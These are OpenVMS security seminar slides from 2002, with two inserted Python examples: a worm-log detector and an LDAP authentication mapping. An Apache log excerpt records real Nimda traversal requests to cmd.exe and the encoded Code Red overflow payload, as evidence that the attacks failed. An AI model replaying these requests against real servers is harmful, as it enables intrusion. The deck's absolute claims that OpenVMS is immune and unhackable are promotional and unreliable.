OpenVMS Security Seminar
John Robert Wisniewski
June, 2002
http://vmsone.com

Security Seminars Agenda
– 1 hour 15 minutes: OpenVMS and IT Security Update – John Wisniewski, OpenVMS Engineering
– 10 minutes: Break
– 1 hour 15 minutes: Vulnerability Assessment – Antonio Martin, Point Secure
– 15 minutes: Q&A
– Schedule Security Consulting Session for tomorrow

After 25 Years… Why OpenVMS…

VMS: when computer failure is not an option!

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
http://story.news.yahoo.com/news?tmpl=story&cid=75&ncid=738&e=8&u=/nf/20020516/tc_nf/17784
".....the Department of Defense has been running cyber security exercises against the National Security Agency, the U.S. Air Force's 92nd Information Warfare Aggressor Squadron, and the Army's Land Information Warfare Activity.
What they have learned is that the "install-and-patch" system does not work, especially against a concentrated attack. Operating systems, they have concluded, need to be designed more securely from the outset."

From Keith Parris’s white paper on comp.os.vms:
Some here have contended that because TCP/IP Services for OpenVMS is based on Tru64 Unix code, it is thus subject to the same level of risk of buffer-overflow exploits as any Unix system out there.
After a bit of investigation, I've discovered that VMS on Alpha appears to be immune to these common smash-the-stack buffer overflow attacks.
To understand why, first one must understand how common buffer-overflow attacks work. (A classic paper on such attacks is "Smashing the Stack for Fun And Profit" written by a hacker who goes by the name Aleph One. You can read it at
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/profit.html)
So Alpha VMS is immune to common stack-smashing buffer-overflow attacks.
While any code that fails to check data lengths against buffer sizes is arguably broken, and needs to be fixed, and Compaq has been doing this to TCP/IP code as buffer-overflow bugs are identified, such bugs are much less critical on Alpha VMS compared with less-protected implementations.

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
SECURITY SEARCH BY OPERATING SYSTEM NAME
http://www.cert.org/
VMS/OpenVMS -- 45 CERT Advisories in 13 years… (2 weeks to check)
Windows 2000 -- 484 CERT Advisories in 11 months (12 weeks)
Linux -- 546 CERT Advisories since 97 (14 weeks)
Solaris -- 490 CERT Advisories in 5 years (12 weeks)
AIX -- 377 CERT Advisories since 94 (9 weeks)
UNIX -- 568 CERT Advisories (14 weeks)
FOR EACH CERT ADVISORY IT WOULD TAKE 1 HOUR (average) for a knowledgeable systems engineer to evaluate and potentially fix!

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
SECURITY SEARCH BY COMPANY
http://www.cert.org/
Oracle --206 CERT Advisories
COMPAQ --236 CERT Advisories
CISCO --361 CERT Advisories
HP --436 CERT Advisories
IBM --626 CERT Advisories
SUN --711 CERT Advisories
MicroSoft --1018 CERT Advisories

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
BUT MICROSOFT IS IN A CLASS BY ITSELF
http://www.cert.org/
Windows 2000 484
Windows XP 21
Windows NT 359
Windows 98 138
Windows 95 75
Windows Networking 401
Windows SQL 80
Windows Visual Basic 16
Windows Visual C++ 2
Windows Visual Studio 8
Windows Java 68
Windows Netscape 71
Windows LDAP 55
Windows Active Directory 31
Windows Media Player 3
Microsoft Exchange 67
Microsoft Word 30
Microsoft Excel 28
Microsoft Power Point 5
Microsoft office 221
Microsoft Internet Explorer 214
Microsoft Chat 38
Microsoft Windows 468
Back Office 257
IIS 205
This list consists of 2845 CERT Advisories regarding MicroSoft OS and Products
Which might take as much as 1.3 YEARS to evaluate.

OpenVMS: immune to viruses
There has never been a reported incident of OpenVMS ever being infected with a virus

NIMDA/Code Red: VMS Apache logs
Subject: access_log. from vmsone
65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
65.193.255.237 - - [28/Sep/2001:23:40:43 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
65.193.255.237 - - [28/Sep/2001:23:40:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
65.193.255.237 - - [28/Sep/2001:23:40:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
65.193.255.237 - - [28/Sep/2001:23:40:47 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
65.193.255.237 - - [28/Sep/2001:23:40:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
65.193.255.237 - - [28/Sep/2001:23:40:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
65.193.255.237 - - [28/Sep/2001:23:40:55 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
65.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
65.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
65.64.234.177 - - [29/Sep/2001:00:22:13 -0500] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:01:08:00 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:01:43:20 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:02:11:05 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
65.64.137.51 - - [29/Sep/2001:15:45:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 27765.64.137.51 - - [29/Sep/2001:15:46:36 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 27565.64.137.51 - - [29/Sep/2001:15:46:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.64.234.177 - - [29/Sep/2001:15:52:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
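A detection pass over logs in this format, added here as an example and not part of the seminar: it parses the Apache common log format, tags each request with the Nimda and Code Red signatures visible in the excerpt above, and reports per source host, so that a run of 404/400 answers to IIS-only paths (root.exe, cmd.exe, default.ida) can be read as a scan that found nothing to hit. The sample lines are constructed in the same shape as the excerpt (the Code Red filler is shortened).

```python
import re
from collections import Counter, defaultdict

# Apache common log format, the shape of the seminar's access_log excerpt:
#   host ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Request-path signatures of the two worms in the excerpt.  Nimda probes for
# the root.exe backdoor left behind by Code Red II and for cmd.exe reached
# through (double-)encoded directory traversal; Code Red sends a long
# GET /default.ida request whose overflow payload is %u-encoded.
SIGNATURES = [
    ("nimda-root.exe", re.compile(r"/root\.exe", re.I)),
    ("nimda-cmd.exe", re.compile(r"/winnt/system32/cmd\.exe", re.I)),
    ("traversal", re.compile(r"\.\.(?:[\\/]|%)")),          # "../", "..\" or "..%xx"
    ("code-red-ida", re.compile(r"^/default\.ida\?", re.I)),
    ("unicode-escape", re.compile(r"%u[0-9a-f]{4}", re.I)),  # %u-encoded payload bytes
]


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Names of every worm signature the request path matches (may be empty)."""
    return [name for name, rx in SIGNATURES if rx.search(path)]


def scan(lines):
    """Yield (host, time, status, tags, path) for each line that hits a signature."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                      # unparseable line: skip, do not guess
        tags = classify(rec["path"])
        if tags:
            yield rec["host"], rec["time"], rec["status"], tags, rec["path"]


def summarize(lines):
    """Per source host: probe count, status-code histogram and the tags seen.

    A host whose probes all drew 404/400 was asking for paths that only exist
    on IIS/Windows, which is what the seminar's VMS Apache log shows.
    """
    report = defaultdict(lambda: {"probes": 0, "status": Counter(), "tags": set()})
    for host, _time, status, tags, _path in scan(lines):
        entry = report[host]
        entry["probes"] += 1
        entry["status"][status] += 1
        entry["tags"].update(tags)
    return dict(report)


# Constructed sample in the shape of the seminar's excerpt (not its lines):
# three Nimda probes, one Code Red request with a shortened filler, and one
# ordinary request that must not be flagged.
SAMPLE_LOG = [
    '65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277',
    '65.193.255.237 - - [28/Sep/2001:23:40:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299',
    '65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282',
    '65.64.234.177 - - [29/Sep/2001:00:22:13 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 272',
    '10.0.0.5 - - [29/Sep/2001:08:00:00 -0500] "GET /index.html HTTP/1.0" 200 1234',
]

if __name__ == "__main__":
    for host, info in sorted(summarize(SAMPLE_LOG).items()):
        print(host, info["probes"], dict(info["status"]), sorted(info["tags"]))
```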

OpenVMS: untouched by hackers
In congressional testimony before the Senate Governmental Affairs Committee, the world’s most notorious hacker, Kevin Mitnick, said he could not penetrate it.
Source: Governmental Affairs Committee Hearing, March 2, 2000

In 20 years of hacking, Kevin Mitnick says he only once failed to penetrate a computer system.
• Regarding that unsuccessful hack attempt, Mitnick, who successfully cracked computer systems belonging to Motorola, Fujitsu and Sun Microsystems, said he targeted the computer because it belonged to an "individual" who had found vulnerabilities in Digital Equipment Corp’s VMS operating system. "And my goal was obtaining information on all security vulnerabilities so I'd be effective in compromising any security system that I chose to compromise," he said.
• However, the hacker said he found his target "extremely difficult" to crack because "this person was very, very sharp" on computer security.

Security Landscape
• The 2002 CSI/FBI computer crime and security survey is out and available at: http://www.gocsi.com/
– Over 500 security practitioners surveyed
– 74% cite their internet connection as the point of attack
– 82% think independent hackers are the likely sources of attack
– Website attacks (hacktivism and DoS)
The face of hacking is changing… but so too are attitudes about hackers:
69% would not consider hiring reformed hackers as consultants!
Would you hire this man?

What is DEFCON 9
• DEFCON is the 9th Convention of Hackers, held once each year in Las Vegas
• http://www.defcon.org/
• 4300+ hackers invaded the hotels around the Alexis Convention Center
OpenVMS was declared Cool and Unhackable by the DEFCON Goons (judges)

OpenVMS At DEFCON 9
OpenVMS was given “Props” from the Goons
The DFWLUG Hacker Squad gained much glory
And Hackers were given a taste of a real Operating System
OpenVMS V7.2-1H1 – shipping
OpenVMS V7.2-2 – shipping
OpenVMS V7.2-6C2 – shipping
OpenVMS V7.3 – shipping

Release Timeline
2001 H1 V7.3
2001 H2 V7.2-2
2002 H3 V7.3-1
2002 H4 Itanium™ Processor Family - First boot
2003 H2 V7.3-x
2003 H2 Itanium™ Processor Family - 1st release
2003 H3 Itanium™ Processor Family - 2nd release
2004 H1 Itanium™ Processor Family - 3rd release
2004... New OpenVMS Itanium™ Processor Family Functional Releases

OpenVMS Security Directions
Enabling Industry Standard Security Protocols for Authentication and Encryption in Heterogeneous Environments
• Protecting information with cryptography
– OpenSSL (open group's secure socket layer)
– CDSA (common data security architecture)
– STUNNEL (secure tunnel)
– SSH (secure shell) – future
– IPSEC (IP security) – future
• Enabling access through new authentication models
– Kerberos
– NTLM (NT authentication)
– Application access to authentication (SYS$ACM)
– LDAP authentication – future
– XML security – future
• Delivering complete security services solutions

Expanding the Model for eBiz
[Diagram: System 1 and System 2, each stacked as Application / Web server / Network / Kernel, with DB storage and a network link between the two systems.]
• Server security
– Authentication
– Authorization
– Access control
• Transport security
– Confidentiality
– Integrity
– Non-repudiation

OpenVMS Security in 7.3-1
• Kerberos
• OpenSSL (secure socket layer)
• 64-bit API calls
• Enhanced documentation
• Certificate tool
• Stunnel (secure tunnel)
• CDSA
• Error reporting tools
• SYS$ACM published

Network Security
[Diagram: System 1 and System 2, each stacked as Application / Web server / Network / Kernel, joined through the Network and Transport layers; the security components drawn on the diagram are PKI tools, SSL, IPSEC, Kerberos and SSH. Legend: Shipping / Planned (the colour coding is not reproduced in this transcript).]

Security MUPs and Advisories
• OpenVMS DECwindows MUP (next)
• OpenVMS Alpha 7.2
– DEC-AXPVMS-VMS72_SYS-V0100--4
– DEC-AXPVMS-VMS721_SYS-V0100--4
• OpenVMS Alpha Security MUP: ALPSMUP01_070 (Versions 6.1, 6.2 & 7.0)
• OpenVMS VAX Security MUP: VAXSMUP03 (All versions prior to 6.1)

DECwindows MUP
The DECwindows Motif server has a potential security vulnerability that could be exploited to allow existing users unauthorized access to data and system resources.
• This mandatory update requires a reboot
• Affected systems are only those that have the DECwindows server installed on them
• Supported versions impacted:
– OpenVMS Alpha versions 6.2, 7.1-2, 7.2-1H1, 7.2-2, 7.3
– OpenVMS VAX versions 6.2, 7.1, 7.2, 7.3
– SEVMS Alpha version 6.2 & SEVMS VAX version 6.2

ACMS Security Advisory
• There is a potential security vulnerability involving ACMS processes having more privileges enabled than the privileges specified in the authorization file.
• To protect against this potential security risk, Compaq is making available an update ECO for ACMS V4.3 customers running OpenVMS Alpha V7.2-1, V7.2-1H1, V7.2-2, and V7.3.
• For ACMS V4.4 customers there is a new version, ACMS V4.4A. ACMS V4.4 customers should upgrade to V4.4A immediately.

Open Source Security Notes
• Compaq’s SSRT (Software Security Response Team) is our voice to the CERT organization: http://www.cert.org/
• Advisories: www.compaq.com/support
Specifically: http://ftp.support.compaq.com/patches/.new/security.shtml
• Current: (SNMP, PHP, zlib, Kerberos)
• No compromise of OpenVMS system security, but a compromise of data could be possible.

Kerberos in OpenVMS (V7.3-1)
• Integration
– Based on MIT Kerberos V5 release 1.0.5
– Available on V7.2, 7.3 (VAX & Alpha) as a web kit
– GSSAPI V2
– GUI & DCL interface
– KDC (Key Distribution Center) & APIs (client)
– Cert fix
• Kerberized Telnet in TCP/IP Services for OpenVMS Version 5.3
Kerberos Futures
• Next version (7.x)
– Port MIT Kerberos V5 release 1.2.4 to OpenVMS
– Provides “hooks” necessary for Kerberized TCP/IP utilities
– Triple-DES encryption available
– Make Kerberos API thread-safe
• Future versions
– Kerberos ACME plug-in
– Cluster-aware KDC
– Use CDSA for cryptographic functions

OpenSSL for OpenVMS
• Port of OpenSSL 0.9.6b
• Layered Product (in V7.3-1 as LP), runs on 7.2-2
• Integration into base O/S when OpenSSL hits 1.0
• PCSI kit containing:
– 32-bit SSL & Crypt libraries
– 64-bit SSL & Crypt libraries
• Features:
– 64-bit SSL and Crypto APIs (32-bit APIs as well)
– Alpha performance
• Documentation & Examples
– New Book – Open Source Security on OpenVMS Alpha
– 200 SSL APIs (60 previously undocumented)
– 40 Crypt APIs (10 previously undocumented)
• Certificate Tool

OpenSSL limitations
OpenSSL is a set of libraries that cannot secure applications without modification to the application.
OpenSSL alone cannot secure popular TCP/IP applications such as telnet and FTP/RCP.
Solutions:
• SSH1 and SSH2 - secure shell
– TCP/IP Services 5.3 security EAK (fall)
– Process Software: http://www.process.com
– OpenSSH
• Stunnel (www.stunnel.org)
– SSL wrapper for TCP/IP applications

Stunnel (Secure Tunnel)
Stunnel is an SSL encryption wrapper between a client and a server that enables non-SSL-aware daemons to communicate with clients over a secure SSL channel.
Stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers without any changes in the programs' code.
• Open Source Project provided on the OpenSource Projects CD
– Limited support
– Telnet & RCP work, but no FTP
– Threaded SMP support!
• Website: http://www.stunnel.org

How STUNNEL works
1. SSL server: (stunnel -d 992 -r localhost:23 -p stunnel.pem)
2. SSL client: (stunnel -c -d 992 -r remote:992)
3. Application: (telnet localhost 992)
[Diagram: on the client side the Application talks to the SSL client (Stunnel) over TCP/IP (step 3); the two Stunnel processes talk SSL to each other (step 2); on the server side the SSL server (Stunnel) hands the decrypted stream to the Application on localhost:23 (step 1).]

Application Security
[Diagram: a Cryptography layer with OpenSSL, Kerberos API, SSL crypto library, BSAFE, PKI/Certificate and CDSA, and an application layer with Crypto apps, S/MIME and PKI. Legend: Shipping / Planned (the colour coding is not reproduced in this transcript).]

CDSA Architecture
[Diagram: CDSA Applications sit on the CSSM Security API, which provides Integrity Services and Security Contexts and dispatches through module managers to plug-in service providers: CSP Manager → Cryptographic Service Provider (SPI); TP Module Manager → Trust Model Library (TPI); AC Module Manager → Authorization Computation Library (ACI); CL Module Manager → Certificate Library (CLI); DL Module Manager → Data Storage Library (DLI).]

CDSA for OpenVMS
• Shipping as part of 7.3-1
• Based on CDSA V2 release 3.11 with some 3.12 features
• Port of the Tru64 implementation, with bilateral authentication
• Prerequisite for IPSEC (will run on 7.2-2 and up)
• Contains RSA & OpenSSL as Crypto Service Providers
• Documentation & Examples
– New Book – Open Source Security on OpenVMS Alpha Vol 1
– 2 example programs: DES, MDS

SYS$ACM
• Published and supported in 7.3-1
• Reduces authentication calls/steps from 12 to 1!
• Example: CSWS for OpenVMS will use this for mod_auth_openvms
• Part 1 – 7.3-1: SYS$ACM published!
• Part 2 – 7.next (VMS): complete framework for external authentication solution (EAK)
– NDA document “ACME Developers Guide”
– New ACME Loginout & Set Password images (not defaults)

LDAP V3 in OpenVMS 7.3
• OpenVMS 7.3 includes an LDAP V3 API to enable access to LDAP directories anywhere in the enterprise.
• LDAP supports multi-threaded 64-bit & 32-bit applications and is COM (Common Object Model) aware.
• Certification efforts
• Microsoft’s Active Directory
• Novell’s NDS
• Compaq’s X.500 V4.0
• Kerberos V5 & Public Key Infrastructure (PKI).

LDAP-based authentication
[Diagram: two paths into the LDAP directory. System authentication: loginout, ftp and telnet call $ACM, which uses the auth_ldap agent. Web authentication: CSWS uses mod_auth_vms. LDAP holds the username/password plus the UAF mapping; the UAF holds the quota and security profile. Legend marks each component as Exists or New.]

LDAP – THE FUTURE DIRECTION OF OPENVMS AUTHENTICATION
Single username & password across the enterprise
• The LDAP directory just stores username and password.
• Usable by many platforms, provided they agree on the same style of LDAP authentication (example: a web page or a VMS/Unix login all use the same username & password).
• Once authenticated, the user is mapped back to a local UAF record.
• Implemented inside the ACME framework.
• Plans are in place to do this work.
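The split of responsibilities that the two LDAP slides describe, written out as an added example (not ACME or VMS code, and not from the seminar): the directory answers only the username/password question, and the UAF record the directory identity is mapped to supplies privileges, quotas and account flags, so a user who binds successfully but has no UAF mapping, or maps to a disabled account, is still refused. The directory bind is a constructed in-memory stand-in; the DN layout and the DISUSER check are assumptions.

```python
import hmac
from dataclasses import dataclass, field
from typing import Callable, Dict, FrozenSet, Optional


@dataclass
class UafRecord:
    """The part of a local UAF record that matters after LDAP has said yes."""
    username: str
    privileges: FrozenSet[str]
    flags: FrozenSet[str] = frozenset()         # e.g. "DISUSER" disables the account
    quotas: Dict[str, int] = field(default_factory=dict)


@dataclass
class AuthResult:
    ok: bool
    reason: str
    profile: Optional[UafRecord] = None


# Constructed stand-in for the directory, DN -> password.  A real deployment
# performs an LDAP simple bind here instead (assumption, not the VMS design).
DIRECTORY = {
    "uid=jsmith,ou=people,dc=example,dc=com": "correct-horse-battery",
    "uid=olduser,ou=people,dc=example,dc=com": "staple",
    "uid=nobody,ou=people,dc=example,dc=com": "secret",
}


def directory_bind(dn: str, password: str) -> bool:
    """Simulated LDAP bind: true only if the DN exists and the password matches."""
    stored = DIRECTORY.get(dn)
    return stored is not None and hmac.compare_digest(stored, password)


# Constructed local UAF and the directory-to-UAF mapping from the slide.
UAF = {
    "JSMITH": UafRecord("JSMITH", frozenset({"TMPMBX", "NETMBX"}), quotas={"WSQUOTA": 2048}),
    "OLDUSER": UafRecord("OLDUSER", frozenset({"TMPMBX"}), flags=frozenset({"DISUSER"})),
}
MAPPING = {"jsmith": "JSMITH", "olduser": "OLDUSER"}   # "nobody" is deliberately unmapped


def authenticate(ldap_user: str, password: str,
                 bind: Callable[[str, str], bool] = directory_bind,
                 uaf: Dict[str, UafRecord] = UAF,
                 mapping: Dict[str, str] = MAPPING) -> AuthResult:
    """The directory authenticates; the mapped UAF record decides what the login gets.

    Every refusal carries the same reason so a caller cannot distinguish an
    unknown directory user, a wrong password, an unmapped user or a disabled
    UAF account.
    """
    dn = f"uid={ldap_user},ou=people,dc=example,dc=com"   # hypothetical DIT layout
    if not bind(dn, password):
        return AuthResult(False, "authentication failed")
    local = mapping.get(ldap_user)
    if local is None or local not in uaf:
        return AuthResult(False, "authentication failed")   # valid in LDAP, no VMS identity
    record = uaf[local]
    if "DISUSER" in record.flags:
        return AuthResult(False, "authentication failed")   # directory said yes, UAF says no
    return AuthResult(True, "ok", record)


if __name__ == "__main__":
    for user, pw in [("jsmith", "correct-horse-battery"), ("jsmith", "wrong"),
                     ("nobody", "secret"), ("olduser", "staple")]:
        r = authenticate(user, pw)
        print(user, r.ok, r.reason, r.profile.username if r.profile else None)
```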

3. Token-based authentication
[Diagram: loginout → $ACM → VMS “x” → CDSA/EMM → smart card holding the private key, with an X.509 directory alongside. Legend marks each component as Exists or New.]

OpenVMS Security Roadmap (2002 – 2005)
Version 7.3-1 (Alpha only)
• CDSA (for IPSEC)
• OpenSSL API published
• SYS$ACM API published
• Kerberos integration
• Stunnel (Secure Tunnel)
ITSEC C2 Security Evaluation on V7.2-2
Encryption for OpenVMS V1.6
TCP/IP Security EAK
Version 7.x (Alpha and VAX)
• ACME Login base deployment
• ACME LOGIN Early Adopters Kit (EAK)
• Updated versions of: OpenSSL, Kerberos, CDSA
• Unix portability features: UID/GUID support, case sensitive passwords, minimum lifetime, CDE deadman, CDE screenlock
Alternative Authentication
• BIOMETRIC support
• Smartcard

got secure web sites?

a recent headline
Microsoft released a “critical” security patch Wednesday for its Web server software, plugging 10 new holes that could allow hackers to take full control of computers running the company’s Internet Information Server (IIS) program.
Microsoft issues “critical” server fix – April 10, 2002
http://news.com.com/2100-1001-880179.html

But wait, there’s more!
• One in Nine IIS Servers Compromised, Survey Says – November 5, 2001 – pcworld.com
• Security hole in SQL Server lets attackers take over – June 13, 2001 – infoworld.com
• Worm hits thousands of Solaris and IIS servers – May 11, 2001 – infoworld.com
• Microsoft gives a virus to its support customers – April 27, 2001 – infoworld.com

Oh, by the way, hackers and viruses aren’t going away
[Chart: incidents per year, 1988 to 2003, on a log scale from 1 to 100,000.]
Source: Carnegie Mellon’s Software Engineering Institute
Note that an incident may involve one site, hundreds of sites, or thousands of sites.

don’t treat the symptoms, cure the disease
Instead of trying to patch your existing web servers again and again and again, start with…
• the most stable,
• the most secure,
• the most reliable server operating system:
OpenVMS
Still, nothing stops it

OpenVMS: secure and stable out of the box
Security
• OpenVMS received a U.S. Trusted Computer System Evaluation Criteria (TCSEC) C2 Security Rating
• Cluster-wide, cluster aware intrusion detection
Stability
• OpenVMS doesn’t fall down
– Often put in a closet and “forgotten”
– Eighteen years without rebooting
• It’s the gold standard for high availability clustering, up to 96 nodes in a cluster

OpenVMS is the foundation for…
HP Secure Web Server for OpenVMS (based on Apache)
Based on the Apache Software Foundation’s “HTTP Server” open source project known as “Apache” – http://httpd.apache.org

Some Apache info…
• HTTP/1.1 (RFC2616) compliant web server
• Runs on Windows, Linux, UNIX, OpenVMS, ...
• Apache is the most popular web server on the Internet with a 63% market share – http://www.netcraft.com/survey
Some companies drop Microsoft IIS for Apache – October 4, 2001
http://www.internetweek.com/newslead01/lead100401.htm

HP Secure Web Server (SWS) for OpenVMS
• Based on recent Apache baselevels
• Tailored for OpenVMS cluster and security architecture
• Includes SSL (certificate-based authentication and encryption services for sockets)
• VeriSign supported platform, for additional security levels
– http://www.verisign.com/support/install/
• www.openvms.compaq.com is running SWS

SWS software and support
Where to get SWS software:
• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html
• e-Business CD shipped with OpenVMS software
Software cost: no cost, it’s FREE!
Support: included in standard OpenVMS license agreement at no additional cost

for more information
SWS web site
• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html

OpenVMS System Management

OpenVMS Tool Plans
• Availability Manager
– V2.2: VMS 7.3-1 support (end of summer)
– V2.3: DECamds parity, no-process event, write locks, low vote, etc.
• Graphical Configuration Manager V1.0 to ship with 7.3-1
• OpenVMS Web Agents V2.3 released in April
– Integrates with CIM 7, supports OVMS 7.1 - 7.3
– Supports new AlphaServer environmentals for DS, ES and GS series
• ECP Data Collector & Performance Analyzer V5.4B with VMS 7.3-1
• Increase access to metrics via system services, industry standard SNMP MIBs & general performance data collector

Performance Solution Positioning
• Availability Manager
– Real-time performance monitor for OpenVMS system managers
– Collects system & process data and is under active development
• ECP Data Collector & Performance Analyzer
– Historical GUI performance analyzer for OpenVMS
– Maintenance releases & limited in scope
• Third Party Performance Solutions (BMC, CA, etc.)
– Enterprise level multi-platform integrated solutions

HP OpenView Connectivity
• CIM Enterprise solution
– Plug-in for HP OpenView
– Used in conjunction with OpenVMS Web agent
– OVMS Web Agents to CIM plug-in to HP OpenView
• Comtek Services (www.comtekservices.com)
– Develop OVMS SNMP Performance Agents
– OpenVMS HP OpenView Network Node Manager (NNM)
– 300 data collection objects and 50 traps for OpenVMS
– 75 data objects, 30 traps & performance graphs for HP OpenView

POLYCENTER Evolution on OpenVMS – Single Products
POLYCENTER Performance Advisor, Data Collector, Accounting Chargeback → BMC Perform & Predict for OpenVMS (http://www.bmc.com)
POLYCENTER Console Manager → TECSYS ConsoleWorks for OpenVMS (http://www.tdix.com)
POLYCENTER System Watchdog → BMC Patrol for OpenVMS (http://www.bmc.com)
